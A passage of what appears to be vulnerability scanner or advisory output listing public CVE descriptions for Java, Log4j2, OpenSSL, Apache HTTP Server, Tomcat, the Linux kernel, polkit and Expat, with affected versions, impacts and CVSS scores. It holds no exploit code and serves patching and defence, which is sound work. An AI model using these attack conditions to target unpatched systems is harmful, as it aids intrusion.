(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).\n (CVE-2022-21291, CVE-2022-21305)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition.\n Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21293, CVE-2022-21294, CVE-2022-21340)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01;\n Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition.\n Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21299)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Serialization). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21341)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: 2D). Supported versions that are affected are Oracle Java SE: 7u321, 8u311; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21349)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: ImageIO). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition.\n Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21360, CVE-2022-21365)\n\n - NSS (Network Security Services) versions prior to 3.73 or 3.68.1 ESR are vulnerable to a heap overflow when handling DER-encoded DSA or RSA-PSS signatures. Applications using NSS for handling signatures encoded within CMS, S/MIME, PKCS \\#7, or PKCS \\#12 are likely to be impacted. Applications using NSS for certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted, depending on how they configure NSS. *Note: This vulnerability does NOT impact Mozilla Firefox.* However, email clients and PDF viewers that use NSS for signature verification, such as Thunderbird, LibreOffice, Evolution and Evince are believed to be impacted. This vulnerability affects NSS < 3.73 and NSS < 3.68.1.\n (CVE-2021-43527)\n\n - xpointer.c in libxml2 before 2.9.5 (as used in Apple iOS before 10, OS X before 10.12, tvOS before 10, and watchOS before 3, and other products) does not forbid namespace nodes in XPointer ranges, which allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free and memory corruption) via a crafted XML document. (CVE-2016-4658)\n\n - AIDE before 0.17.4 allows local users to obtain root privileges via crafted file metadata (such as XFS extended attributes or tmpfs ACLs), because of a heap-based buffer overflow. (CVE-2021-45417)\n\n - Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.\n (CVE-2021-44832)\n\n - An issue was discovered in Linux: KVM through Improper handling of VM_IO|VM_PFNMAP vmas in KVM can bypass RO checks and can lead to pages being freed while still accessible by the VMM and guest. This allows users with the ability to start and control a VM to read/write random pages of memory and can result in local privilege escalation. (CVE-2021-22543)\n\n - A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested guest (L2). Due to improper validation of the int_ctl field, this issue could allow a malicious L1 to enable AVIC support (Advanced Virtual Interrupt Controller) for the L2 guest. As a result, the L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak of sensitive data or potential guest-to-host escape. This flaw affects Linux kernel versions prior to 5.14-rc7. (CVE-2021-3653)\n\n - A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested guest (L2). Due to improper validation of the virt_ext field, this issue could allow a malicious L1 to disable both VMLOAD/VMSAVE intercepts and VLS (Virtual VMLOAD/VMSAVE) for the L2 guest. As a result, the L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak of sensitive data or potential guest-to-host escape. (CVE-2021-3656)\n\n - arch/powerpc/kvm/book3s_rtas.c in the Linux kernel through 5.13.5 on the powerpc platform allows KVM guest OS users to cause host OS memory corruption via rtas_args.nargs, aka CID-f62f3c20647e. (CVE-2021-37576)\n\n - Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.\n (CVE-2021-44228)\n\n - It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non- default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n (CVE-2021-45046)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissable length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash.\n OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i).\n Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x). (CVE-2021-23840)\n\n - The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x). (CVE-2021-23841)\n\n - A vulnerability in the JNDI Realm of Apache Tomcat allows an attacker to authenticate using variations of a valid user name and/or to bypass some of the protection provided by the LockOut Realm. This issue affects Apache Tomcat 10.0.0-M1 to 10.0.5; 9.0.0.M1 to 9.0.45; 8.5.0 to 8.5.65. (CVE-2021-30640)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N). (CVE-2021-35550)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35556)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35559)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Utility). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35561)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Keytool). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts).\n CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N). (CVE-2021-35564)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35565)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Libraries). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows low privileged attacker with network access via Kerberos to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products.\n Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 6.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N). (CVE-2021-35567)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35578)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n ImageIO). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35586)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Hotspot). Supported versions that are affected are Java SE: 7u311, 8u301; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.1 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L). (CVE-2021-35588)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). (CVE-2021-35603)\n\n - Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1. (CVE-2021-45105)\n\n - In various methods of hid-multitouch.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed.\n User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID:\n A-162844689References: Upstream kernel (CVE-2020-0465)\n\n - In do_epoll_ctl and ep_loop_check_proc of eventpoll.c, there is a possible use after free due to a logic error. This could lead to local escalation of privilege with no additional execution privileges needed.\n User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID:\n A-147802478References: Upstream kernel (CVE-2020-0466)\n\n - In unix_scm_to_skb of af_unix.c, there is a possible use after free bug due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-196926917References:\n Upstream kernel (CVE-2021-0920)\n\n - A flaw double-free memory corruption in the Linux kernel HCI device initialization subsystem was found in the way user attach malicious HCI TTY Bluetooth device. A local user could use this flaw to crash the system. This flaw affects all the Linux kernel versions starting from 3.13. (CVE-2021-3564)\n\n - A use-after-free in function hci_sock_bound_ioctl() of the Linux kernel HCI subsystem was found in the way user calls ioct HCIUNBLOCKADDR or other way triggers race condition of the call hci_unregister_dev() together with one of the calls hci_sock_blacklist_add(), hci_sock_blacklist_del(), hci_get_conn_info(), hci_get_auth_info(). A privileged local user could use this flaw to crash the system or escalate their privileges on the system. This flaw affects the Linux kernel versions prior to 5.13-rc5. (CVE-2021-3573)\n\n - A use-after-free flaw was found in the Linux kernel's Bluetooth subsystem in the way user calls connect to the socket and disconnect simultaneously due to a race condition. This flaw allows a user to crash the system or escalate their privileges. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-3752)\n\n - A data leak flaw was found in the way XFS_IOC_ALLOCSP IOCTL in the XFS filesystem allowed for size increase of files with unaligned size. A local attacker could use this flaw to leak data on the XFS filesystem otherwise not accessible to them. (CVE-2021-4155)\n\n - A random memory access flaw was found in the Linux kernel's GPU i915 kernel driver functionality in the way a user may run malicious code on the GPU. This flaw allows a local user to crash the system or escalate their privileges on the system. (CVE-2022-0330)\n\n - A use-after-free flaw was found in the Linux kernel's vmw_execbuf_copy_fence_user function in drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c in vmwgfx. This flaw allows a local attacker with user privileges to cause a privilege escalation problem. (CVE-2022-22942)\n\n - A flaw was found in OpenLDAP. This flaw allows an attacker who can send a malicious packet to be processed by OpenLDAP's slapd server, to trigger an assertion failure. The highest threat from this vulnerability is to system availability. (CVE-2020-25709)\n\n - A flaw was found in OpenLDAP in versions before 2.4.56. This flaw allows an attacker who sends a malicious packet processed by OpenLDAP to force a failed assertion in csnNormalize23(). The highest threat from this vulnerability is to system availability. (CVE-2020-25710)\n\n - When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter=null (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed. (CVE-2020-9484)\n\n - The fix for bug CVE-2020-9484 introduced a time of check, time of use vulnerability into Apache Tomcat 10.1.0-M1 to 10.1.0-M8, 10.0.0-M5 to 10.0.14, 9.0.35 to 9.0.56 and 8.5.55 to 8.5.73 that allowed a local attacker to perform actions with the privileges of the user that the Tomcat process is using. This issue is only exploitable when Tomcat is configured to persist sessions using the FileStore. (CVE-2022-23181)\n\n - An issue was discovered in the Linux kernel before 5.10. drivers/infiniband/core/ucma.c has a use-after- free because the ctx is reached via the ctx_list in some ucma_migrate_id situations where ucma_close is called, aka CID-f5449e74802c. (CVE-2020-36385)\n\n - In Apache HTTP Server versions 2.4.0 to 2.4.46 a specially crafted SessionHeader sent by an origin server could cause a heap overflow (CVE-2021-26691)\n\n - Malformed requests may cause the server to dereference a NULL pointer. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-34798)\n\n - ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules pass untrusted data to these functions, but third-party / external modules may. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-39275)\n\n - A carefully crafted request body can cause a buffer overflow in the mod_lua multipart parser (r:parsebody() called from Lua scripts). The Apache httpd team is not aware of an exploit for the vulnerabilty though it might be possible to craft one. This issue affects Apache HTTP Server 2.4.51 and earlier. (CVE-2021-44790)\n\n - A flaw was found in RPM's signature check functionality when reading a package file. This flaw allows an attacker who can convince a victim to install a seemingly verifiable package, whose signature header was modified, to cause RPM database corruption and execute code. The highest threat from this vulnerability is to data integrity, confidentiality, and system availability. (CVE-2021-20271)\n\n - In Cyrus SASL 2.1.17 through 2.1.27 before 2.1.28, plugins/sql.c does not escape the password for a SQL INSERT or UPDATE statement. (CVE-2022-24407)\n\n - The fix for bug 63362 present in Apache Tomcat 10.1.0-M1 to 10.1.0-M5, 10.0.0-M1 to 10.0.11, 9.0.40 to 9.0.53 and 8.5.60 to 8.5.71 introduced a memory leak. The object introduced to collect metrics for HTTP upgrade connections was not released for WebSocket connections once the connection was closed. This created a memory leak that, over time, could lead to a denial of service via an OutOfMemoryError.\n (CVE-2021-42340)\n\n - A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine. (CVE-2021-4034)\n\n - The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self- signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc). (CVE-2022-0778)\n\n - Apache HTTP Server 2.4.52 and earlier fails to close inbound connection when errors are encountered discarding the request body, exposing the server to HTTP Request Smuggling (CVE-2022-22720)\n\n - An issue was discovered in SaltStack Salt before 3003.3. A user who has control of the source, and source_hash URLs can gain full file system access as root on a salt minion. (CVE-2021-21996)\n\n - In Expat (aka libexpat) before 2.4.3, a left shift by 29 (or more) places in the storeAtts function in xmlparse.c can lead to realloc misbehavior (e.g., allocating too few bytes, or only freeing memory).\n (CVE-2021-45960)\n\n - In doProlog in xmlparse.c in Expat (aka libexpat) before 2.4.3, an integer overflow exists for m_groupSize. (CVE-2021-46143)\n\n - addBinding in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. (CVE-2022-22822)\n\n - build_model in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. (CVE-2022-22823)\n\n - defineAttribute in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.\n (CVE-2022-22824)\n\n - lookup in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. (CVE-2022-22825)\n\n - nextScaffoldPart in xmlparse.c in Expat (aka libexpat) before 